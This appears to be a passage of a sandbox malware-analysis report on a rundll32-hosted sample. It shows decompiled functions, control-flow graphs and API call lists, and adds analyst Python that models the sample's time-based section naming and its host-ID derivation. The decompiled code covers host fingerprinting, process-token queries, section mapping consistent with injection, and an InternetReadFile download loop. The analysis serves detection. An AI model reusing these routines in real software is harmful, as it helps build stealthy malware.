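E04A176BB derives the section name from the clock: the 64-bit FILETIME from GetSystemTimeAsFileTime is divided (the _aulldiv call) by the constant 0x192:0x54D38000 pushed just before it, which is 1,728,000,000,000 ticks of 100 ns, i.e. exactly 48 hours, and the quotient is among the _snwprintf arguments. CreateFileMappingW is then called with INVALID_HANDLE_VALUE, PAGE_READWRITE (4) and a 0x1000-byte maximum size, and the function only goes on to MapViewOfFile (access 6, read plus write) when GetLastError() is 0xB7, ERROR_ALREADY_EXISTS; a section that did not exist before is closed again and the function returns 2. The Python below is an added example, not code from the report or from the sample: it reproduces the 48-hour bucket arithmetic from a Unix timestamp, inverts it to a time window, and models the return value of the rendezvous check, so an analyst can predict which bucket a given run used. The _snwprintf format string is not visible in this excerpt, so the example stops at the numeric value and does not guess the final name.

```python
import datetime

# The two dwords pushed before _aulldiv form the 64-bit divisor 0x0000019254D38000.
NAME_DIVISOR = (0x192 << 32) | 0x54D38000
FILETIME_PER_SECOND = 10_000_000                  # FILETIME counts 100 ns ticks since 1601-01-01 UTC
UNIX_EPOCH_AS_FILETIME = 116_444_736_000_000_000  # ticks between 1601-01-01 and 1970-01-01
ERROR_ALREADY_EXISTS = 0xB7                       # the value tested right after CreateFileMappingW
ERROR_FILE_NOT_FOUND = 0x2                        # returned when the section did not exist yet
UTC = datetime.timezone.utc


def filetime_from_unix(unix_seconds):
    """The value GetSystemTimeAsFileTime returns at that instant (whole seconds)."""
    return int(unix_seconds) * FILETIME_PER_SECOND + UNIX_EPOCH_AS_FILETIME


def name_bucket(filetime):
    """The quotient the sample formats into the section name; it increments every 48 hours."""
    return filetime // NAME_DIVISOR


def bucket_window(bucket):
    """Inverse of name_bucket: UTC [start, end) of the 48-hour window one bucket value covers."""
    start_unix = (bucket * NAME_DIVISOR - UNIX_EPOCH_AS_FILETIME) // FILETIME_PER_SECOND
    start = datetime.datetime.fromtimestamp(start_unix, tz=UTC)
    return start, start + datetime.timedelta(seconds=NAME_DIVISOR // FILETIME_PER_SECOND)


def rendezvous_result(create_ok, create_error, map_ok, map_error):
    """Return value of E04A176BB for the four outcomes the decompiled branches distinguish:
    0 only when a section of this name ALREADY existed and could be mapped, 2 when the call
    created a new section (which is closed again), otherwise the Win32 error that was observed."""
    if not create_ok:
        return create_error
    if create_error != ERROR_ALREADY_EXISTS:
        return ERROR_FILE_NOT_FOUND
    return 0 if map_ok else map_error


if __name__ == "__main__":
    now = int(datetime.datetime.now(tz=UTC).timestamp())
    bucket = name_bucket(filetime_from_unix(now))
    start, end = bucket_window(bucket)
    print("current bucket %d covers %s to %s" % (bucket, start.isoformat(), end.isoformat()))
```

Two consequences for detection and replay: an object name built from this value is only stable inside its 48-hour window, so a name captured in one sandbox run will not match a run two days later unless you recompute the bucket for that date; and because success requires ERROR_ALREADY_EXISTS, this routine is a consumer of a section some other component created earlier, not the creator.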

                            Control-flow Graph

Control-flow graph (rendered as an image in the original report; legend: executed / not executed). Basic blocks with their successors:
353 4a13365-4a13379 -> 354, 355
354 4a13383-4a13395 call 4a12119 -> 358, 359
355 4a1337b-4a13380 -> 354
358 4a13397-4a133a7 GetUserNameW -> 360, 361
359 4a133e9-4a133f6 -> 361
360 4a133a9-4a133b9 RtlAllocateHeap -> 361, 362
361 4a133f8-4a1340f GetComputerNameW -> 363, 364
362 4a133bb-4a133c8 GetUserNameW -> 365, 366
363 4a13411-4a13422 RtlAllocateHeap -> 364, 367
364 4a1344d-4a13471 (exit)
365 4a133d8-4a133e7 HeapFree -> 361
366 4a133ca-4a133d6 call 4a1708d -> 365
367 4a13424-4a1342d GetComputerNameW -> 369, 370
369 4a1342f-4a1343b call 4a1708d -> 370
370 4a1343e-4a13447 HeapFree -> 364
                            C-Code - Quality: 96%
                            			E04A13365(char __eax, void* __esi) {
                            				long _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v28;
                            				long _t34;
                            				signed int _t39;
                            				long _t50;
                            				char _t59;
                            				intOrPtr _t61;
                            				void* _t62;
                            				void* _t64;
                            				char _t65;
                            				intOrPtr* _t67;
                            				void* _t68;
                            				void* _t69;
                            
                            				_t69 = __esi;
                            				_t65 = __eax;
                            				_v8 = 0;
                            				_v12 = __eax;
                            				if(__eax == 0) {
                            					_t59 =  *0x4a1a310; // 0xd448b889
                            					_v12 = _t59;
                            				}
                            				_t64 = _t69;
                            				E04A12119( &_v12, _t64);
                            				if(_t65 != 0) {
                            					 *_t69 =  *_t69 ^  *0x4a1a344 ^ 0x46d76429;
                            				} else {
                            					GetUserNameW(0,  &_v8); // executed
                            					_t50 = _v8;
                            					if(_t50 != 0) {
                            						_t62 = RtlAllocateHeap( *0x4a1a2d8, 0, _t50 + _t50);
                            						if(_t62 != 0) {
                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                            								_t64 = _t62;
                            								 *_t69 =  *_t69 ^ E04A1708D(_v8 + _v8, _t64);
                            							}
                            							HeapFree( *0x4a1a2d8, 0, _t62);
                            						}
                            					}
                            				}
                            				_t61 = __imp__;
                            				_v8 = _v8 & 0x00000000;
                            				GetComputerNameW(0,  &_v8);
                            				_t34 = _v8;
                            				if(_t34 != 0) {
                            					_t68 = RtlAllocateHeap( *0x4a1a2d8, 0, _t34 + _t34);
                            					if(_t68 != 0) {
                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                            							_t64 = _t68;
                            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04A1708D(_v8 + _v8, _t64);
                            						}
                            						HeapFree( *0x4a1a2d8, 0, _t68);
                            					}
                            				}
                            				asm("cpuid");
                            				_t67 =  &_v28;
                            				 *_t67 = 1;
                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                            				 *((intOrPtr*)(_t67 + 8)) = 0;
                            				 *(_t67 + 0xc) = _t64;
                            				_t39 = _v16 ^ _v20 ^ _v28;
                            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                            				return _t39;
                            			}
Per-line addresses of the listing above (aligned with the C-code in the original report): 0x04a13365 to 0x04a13471.

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04A1339C
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A133B3
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 04A133C0
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A133E1
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A13408
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04A1341C
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04A13429
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04A13447
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: 130571ef74958f84946989d421c75b9cf1f562023c6ad3db6136c7947d2574f2
                            • Instruction ID: aa32277cd8b71f78577a21b902b87b0e82a3fe2fa5a059b80c1b46fd1c83c52e
                            • Opcode Fuzzy Hash: 130571ef74958f84946989d421c75b9cf1f562023c6ad3db6136c7947d2574f2
                            • Instruction Fuzzy Hash: 53311B71A00205EFEB11DFA9DD81AAEB7F9EB58310F514469E905D7220DB74EE42DB10
                            Uniqueness

                            Uniqueness Score: -1.00%
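E04A13365 folds host identity into a 16-byte structure at __esi: the caller-supplied seed (or, when it is zero, the value at 0x4a1a310) goes through E04A12119; then either dword 0 is XORed with *0x4a1a344 ^ 0x46d76429 (when __eax was non-zero) or with a hash of the user name; dword 3 is XORed with a hash of the computer name; and dword 1 with three of the CPUID leaf-1 output registers (saved at _v28, _v20 and _v16, with _v24 unused, which in the usual eax/ebx/ecx/edx save order means ebx is skipped; the decompiler has lost the register names). Two details matter if you re-derive such an ID: the hashed buffers are UTF-16LE (the length passed to E04A1708D is _v8 + _v8 bytes), and the second GetUserNameW reports the character count including the terminating null while the second GetComputerNameW reports it without the null (documented behaviour of both APIs), so the user-name hash covers two extra zero bytes and the computer-name hash does not. The Python below is an added example, not code from the report or from the sample: E04A1708D is not in this excerpt, so a CRC32 stand-in is used purely so the code runs, which means its output is not the sample's real ID; the names and CPUID values are constructed.

```python
import zlib

OBFUSCATION_CONST = 0x46D76429   # immediate from `*_t69 = *_t69 ^ *0x4a1a344 ^ 0x46d76429`
MASK32 = 0xFFFFFFFF


def hash_stub(data):
    """Stand-in for the sample's E04A1708D(length, buffer). CRC32 is an assumption made so the
    example runs; the real routine is not shown on this page."""
    return zlib.crc32(data) & MASK32


def user_name_buffer(name):
    """Bytes the code hashes after the second GetUserNameW: UTF-16LE with the null INCLUDED,
    because GetUserNameW returns the copied character count including the terminator."""
    return (name + "\0").encode("utf-16-le")


def computer_name_buffer(name):
    """Bytes hashed after the second GetComputerNameW: UTF-16LE with the null EXCLUDED,
    because GetComputerNameW returns the count without the terminator."""
    return name.encode("utf-16-le")


def derive_words(words, seed_nonzero, global_4a1a344, user, computer, cpuid1):
    """Apply the XOR layout of E04A13365 to a 4-dword structure and return the updated list.
    words:          the four dwords at __esi after E04A12119 has initialised them
    seed_nonzero:   whether __eax (the caller's seed) was non-zero
    global_4a1a344: the dword read from 0x4a1a344
    cpuid1:         (eax, ebx, ecx, edx) as returned by CPUID leaf 1 on the host (constructed here)"""
    w = list(words)
    if seed_nonzero:
        w[0] ^= (global_4a1a344 ^ OBFUSCATION_CONST) & MASK32
    else:
        w[0] ^= hash_stub(user_name_buffer(user))
    w[3] ^= hash_stub(computer_name_buffer(computer))
    eax, _ebx, ecx, edx = cpuid1            # ebx (_v24) is saved but never folded in
    w[1] ^= (eax ^ ecx ^ edx) & MASK32
    return w


if __name__ == "__main__":
    # Constructed inputs; the CPUID tuple is a plausible leaf-1 result, not a measured one.
    ident = derive_words([0, 0, 0, 0], False, 0, "Admin", "DESKTOP-01",
                         (0x000906EA, 0x00100800, 0x7FFAFBFF, 0xBFEBFBFF))
    print(" ".join("%08x" % x for x in ident))
```

The practical point of the two buffer helpers: an analyst who hashes the plain ASCII user name, or who forgets the trailing null that GetUserNameW's count includes, will never reproduce dword 0 even with the correct hash routine, while the computer-name dword must be computed without that null.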

                            Control-flow Graph

Control-flow graph (rendered as an image in the original report; legend: executed / not executed). Basic blocks with their successors:
477 4f68fec-4f68ffe -> 478, 479
478 4f69000-4f69006 -> 480
479 4f69008 -> 480
480 4f6900e-4f69022 call 4f77ac9 -> 483, 484
483 4f69024-4f69032 StrRChrA -> 485, 486
484 4f6905e-4f69088 call 4f6c431 -> 491, 492
485 4f69037 -> 488
486 4f69034-4f69035 -> 488
488 4f6903d-4f69058 _strupr lstrlen call 4f80ee0 -> 484
491 4f690a6-4f690ae -> 495, 496
492 4f6908a-4f6908e -> 491, 494
494 4f69090-4f6909b -> 491, 497
495 4f690b5-4f690d3 CreateEventA -> 499, 500
496 4f690b0-4f690b3 -> 498
497 4f6909d-4f690a4 -> 491, 497
498 4f69113-4f6911a -> 503, 504
499 4f69107-4f6910d GetLastError -> 502
500 4f690d5-4f690dc call 4f75e8d -> 499, 506
502 4f6910f-4f69111 -> 498, 504
503 4f6911c-4f69123 RtlRemoveVectoredExceptionHandler -> 504
504 4f69129-4f6912e (exit)
506 4f690de-4f690e5 -> 507, 508
507 4f690e7-4f690f3 RtlAddVectoredExceptionHandler -> 508
508 4f690f8-4f690fb call 4f700dc -> 510
510 4f69100-4f69105 -> 499, 502
                            APIs
                            • StrRChrA.SHLWAPI(0631B5B0,00000000,0000005C,?,?,?), ref: 04F69028
                            • _strupr.NTDLL ref: 04F6903E
                            • lstrlen.KERNEL32(0631B5B0,?,?), ref: 04F69046
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 04F690C6
                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,04F8076B), ref: 04F690ED
                            • GetLastError.KERNEL32(?,?,?,?), ref: 04F69107
                            • RtlRemoveVectoredExceptionHandler.NTDLL(04FC05B8), ref: 04F6911D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                            • String ID:
                            • API String ID: 2251957091-0
                            • Opcode ID: 23bb3fe2763f1ad6ea9286b4f49c57f265eb060be4c2b8a576b36b7696015594
                            • Instruction ID: b50069d510c7cf640453a346c062385a9179e87f2943b1756467b2d8380b1832
                            • Opcode Fuzzy Hash: 23bb3fe2763f1ad6ea9286b4f49c57f265eb060be4c2b8a576b36b7696015594
                            • Instruction Fuzzy Hash: DA3186B2D00519AFEB11AFB4BC88D7E77A4E704354B15042FE613DB140E679AC468F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 04F6C478
                            • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 04F6C48B
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 04F6C4A7
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 04F6C4C4
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 04F6C4D1
                            • NtClose.NTDLL(?), ref: 04F6C4E3
                            • NtClose.NTDLL(?), ref: 04F6C4ED
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: a80811a4416b76d9e69432ecbcc6a96b5b7072f7c809fb68ceab833221ab3bd4
                            • Instruction ID: 209c167c41ff45cf74443988f3eebd759ac09007163a534548a0f5abe46d235b
                            • Opcode Fuzzy Hash: a80811a4416b76d9e69432ecbcc6a96b5b7072f7c809fb68ceab833221ab3bd4
                            • Instruction Fuzzy Hash: 952114B290021CBBDB01EF95DC45AEEBFBDEF08740F104066F901EA160D7759A41DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E04A14321(char _a4, void* _a8) {
                            				void* _v8;
                            				void* _v12;
                            				char _v16;
                            				void* _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				void* _v44;
                            				void** _t33;
                            				void* _t40;
                            				void* _t43;
                            				void** _t44;
                            				intOrPtr* _t47;
                            				char _t48;
                            
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v20 = _a4;
                            				_t48 = 0;
                            				_v16 = 0;
                            				_a4 = 0;
                            				_v44 = 0x18;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v36 = 0;
                            				_v28 = 0;
                            				_v24 = 0;
                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                            					_t33 =  &_v8;
                            					__imp__(_v12, 8, _t33);
                            					if(_t33 >= 0) {
                            						_t47 = __imp__;
                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                            						_t44 = E04A16D63(_a4);
                            						if(_t44 != 0) {
                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                            							if(_t40 >= 0) {
                            								memcpy(_a8,  *_t44, 0x1c);
                            								_t48 = 1;
                            							}
                            							E04A16C2C(_t44);
                            						}
                            						NtClose(_v8); // executed
                            					}
                            					NtClose(_v12);
                            				}
                            				return _t48;
                            			}
Per-line addresses of the listing above (aligned with the C-code in the original report): 0x04a1432e to 0x04a143e8.

                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04A14368
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04A1437B
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A14397
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04A143B4
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 04A143C1
                            • NtClose.NTDLL(?), ref: 04A143D3
                            • NtClose.NTDLL(00000000), ref: 04A143DD
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: 2281a71ed8c6167356dca8e03074c6a59b1247413d9524e201f896c131776f03
                            • Instruction ID: ea4fa974ae1e99a6898f4278f60c14154b39b1c11e93617ac855c28b6595160a
                            • Opcode Fuzzy Hash: 2281a71ed8c6167356dca8e03074c6a59b1247413d9524e201f896c131776f03
                            • Instruction Fuzzy Hash: FA21E9B1900118BBEF019F95DD85ADEBFBDEF08740F104016F905E6120D7B19A55DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memcpy.NTDLL(?,?,?,04F6C71A,?,?,?,?,?,04F6C71A,?,?,00000000), ref: 04F76F59
                              • Part of subcall function 04F6C4FB: GetModuleHandleA.KERNEL32(?,?,?,04F77017,?,?,?,00000000), ref: 04F6C539
                              • Part of subcall function 04F6C4FB: memcpy.NTDLL(?,04F8A30C,00000018,?,?,?), ref: 04F6C5B5
                            • memcpy.NTDLL(?,?,00000018,04F6C71A,?,?,?,?,?,04F6C71A,?,?,00000000), ref: 04F76FA7
                            • memcpy.NTDLL(?,04F7DD8F,00000800,?,?,?,00000000), ref: 04F7702A
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 04F77068
                            • NtClose.NTDLL(00000000,?,00000000), ref: 04F7708F
                              • Part of subcall function 04F78F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,04F6C71A,04F6C71A,?,04F76EFA,?,04F6C71A,?,?,00000000), ref: 04F78F87
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FA9
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FBF
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FD5
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F78FEB
                              • Part of subcall function 04F78F62: GetProcAddress.KERNEL32(00000000,?), ref: 04F79001
                              • Part of subcall function 04F7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,04F6717E,00000000,00000000,04F6717E,?,00000002,00000000,?,04F6C71A,00000000,04F6717E,000000FF,?), ref: 04F7BEAE
                              • Part of subcall function 04F71CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,04F6C71A,?,?,00000000), ref: 04F71D58
                              • Part of subcall function 04F71CE4: memcpy.NTDLL(?,?,?), ref: 04F71DBF
                            • memset.NTDLL ref: 04F770AA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                            • String ID:
                            • API String ID: 3674896251-0
                            • Opcode ID: b44599f369bf8957862984120ee653071dcedb557197176a11005ea7c14649fc
                            • Instruction ID: 6d58bd93ec24870682434f00c11cc9f6a2127a827ba687bf329093167df7d75b
                            • Opcode Fuzzy Hash: b44599f369bf8957862984120ee653071dcedb557197176a11005ea7c14649fc
                            • Instruction Fuzzy Hash: 95A12E71E0060ADFDB11DF98C884AAEBBF4FF04304F14456AE915A7250E739BA56DF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E04A11CA5(void* __eax, void* __ecx) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				void _v20;
                            				void* __esi;
                            				void* _t30;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				intOrPtr* _t41;
                            				int _t45;
                            				long _t47;
                            				void* _t54;
                            				long _t64;
                            				void* _t67;
                            				void* _t69;
                            
                            				_t58 = __ecx;
                            				_t67 = __eax;
                            				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                            					L2:
                            					_t30 = _t67;
                            					_pop(_t68);
                            					_t69 = _t30;
                            					_t64 = 0;
                            					ResetEvent( *(_t69 + 0x1c));
                            					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
                            						L9:
                            						if(_v8 == 0) {
                            							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                            						} else {
                            							 *0x4a1a174(0, 1,  &_v12); // executed
                            							if(0 != 0) {
                            								_t64 = 8;
                            							} else {
                            								_t38 = E04A16D63(0x1000);
                            								_v16 = _t38;
                            								if(_t38 == 0) {
                            									_t64 = 8;
                            								} else {
                            									_push(0);
                            									_push(_v8);
                            									_push( &_v20);
                            									while(1) {
                            										_t41 = _v12;
                            										_t61 =  *_t41;
                            										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                            										ResetEvent( *(_t69 + 0x1c));
                            										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                            										if(_t45 != 0) {
                            											goto L17;
                            										}
                            										_t64 = GetLastError();
                            										if(_t64 == 0x3e5) {
                            											_t64 = E04A16E40( *(_t69 + 0x1c), _t61, 0xffffffff);
                            											if(_t64 == 0) {
                            												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                            												if(_t64 == 0) {
                            													goto L17;
                            												}
                            											}
                            										}
                            										L19:
                            										E04A16C2C(_v16);
                            										if(_t64 == 0) {
                            											_t47 = E04A115CC(_v12, _t69); // executed
                            											_t64 = _t47;
                            										}
                            										goto L22;
                            										L17:
                            										_t64 = 0;
                            										if(_v8 != 0) {
                            											_push(0);
                            											_push(_v8);
                            											_push(_v16);
                            											continue;
                            										}
                            										goto L19;
                            									}
                            								}
                            								L22:
                            								_t39 = _v12;
                            								 *((intOrPtr*)( *_t39 + 8))(_t39);
                            							}
                            						}
                            					} else {
                            						_t64 = GetLastError();
                            						if(_t64 != 0x3e5) {
                            							L8:
                            							if(_t64 == 0) {
                            								goto L9;
                            							}
                            						} else {
                            							_t64 = E04A16E40( *(_t69 + 0x1c), _t58, 0xffffffff);
                            							if(_t64 == 0) {
                            								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                            								goto L8;
                            							}
                            						}
                            					}
                            					return _t64;
                            				} else {
                            					_t54 = E04A14A85(__ecx, __eax);
                            					if(_t54 != 0) {
                            						return _t54;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            			}

                            APIs
                            • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,761F81D0,00000000,00000000), ref: 04A1739C
                            • InternetReadFile.WININET(?,?,00000004,?), ref: 04A173AB
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?,?), ref: 04A173B5
                            • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A1742E
                            • InternetReadFile.WININET(?,?,00001000,?), ref: 04A1743F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?,?), ref: 04A17449
                              • Part of subcall function 04A14A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,761F81D0,00000000,00000000), ref: 04A14A9C
                              • Part of subcall function 04A14A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A14AAC
                              • Part of subcall function 04A14A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A14ADE
                              • Part of subcall function 04A14A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B03
                              • Part of subcall function 04A14A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B23
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                            • String ID:
                            • API String ID: 2393427839-0
                            • Opcode ID: 32f5ac24e70e4fad8ee3605ab51a23d0e0bbc08f5f53f3b53fd96f3ef10d92b5
                            • Instruction ID: 45aa6929994207f104a1e3d91b648ff84e9b250849d739b183081e0ae09489b2
                            • Opcode Fuzzy Hash: 32f5ac24e70e4fad8ee3605ab51a23d0e0bbc08f5f53f3b53fd96f3ef10d92b5
                            • Instruction Fuzzy Hash: D141153A600614AFDB219FA4CC40BAFBBBAEF88360F154528E556D71B0EB70F941CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04F7235C
                            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04F72369
                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04F723F5
                            • GetModuleHandleA.KERNEL32(00000000), ref: 04F72400
                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F72409
                            • RtlExitUserThread.NTDLL(00000000), ref: 04F7241E
                              • Part of subcall function 04F70818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F72397,?), ref: 04F70820
                              • Part of subcall function 04F70818: GetVersion.KERNEL32 ref: 04F7082F
                              • Part of subcall function 04F70818: GetCurrentProcessId.KERNEL32 ref: 04F7084B
                              • Part of subcall function 04F70818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04F70868
                              • Part of subcall function 04F6C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 04F6C815
                              • Part of subcall function 04F6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04F67D5E), ref: 04F6A6BE
                              • Part of subcall function 04F7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,04F6111D,00000000), ref: 04F7214D
                              • Part of subcall function 04F7212C: GetProcAddress.KERNEL32(00000000,?), ref: 04F72166
                              • Part of subcall function 04F7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04F6111D,00000000), ref: 04F72183
                              • Part of subcall function 04F7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,04F6111D,00000000), ref: 04F72194
                              • Part of subcall function 04F7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,04F6111D,00000000), ref: 04F721A7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                            • String ID:
                            • API String ID: 2581485877-0
                            • Opcode ID: f6fd61859e74cb724890850492217f22773a159d9682ee0e2cd399520f69d817
                            • Instruction ID: 6449f500561605a4d0cce92484c73ce4f89b08a934792438cd217c979890b196
                            • Opcode Fuzzy Hash: f6fd61859e74cb724890850492217f22773a159d9682ee0e2cd399520f69d817
                            • Instruction Fuzzy Hash: 7531C032E00118AFCB12AFB4EC84E7E77A8EB45754F12416EE506EB201D738AD46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E04A168BD() {
                            				char _v264;
                            				void* _v300;
                            				void* _t5;
                            				int _t8;
                            				intOrPtr _t9;
                            				int _t15;
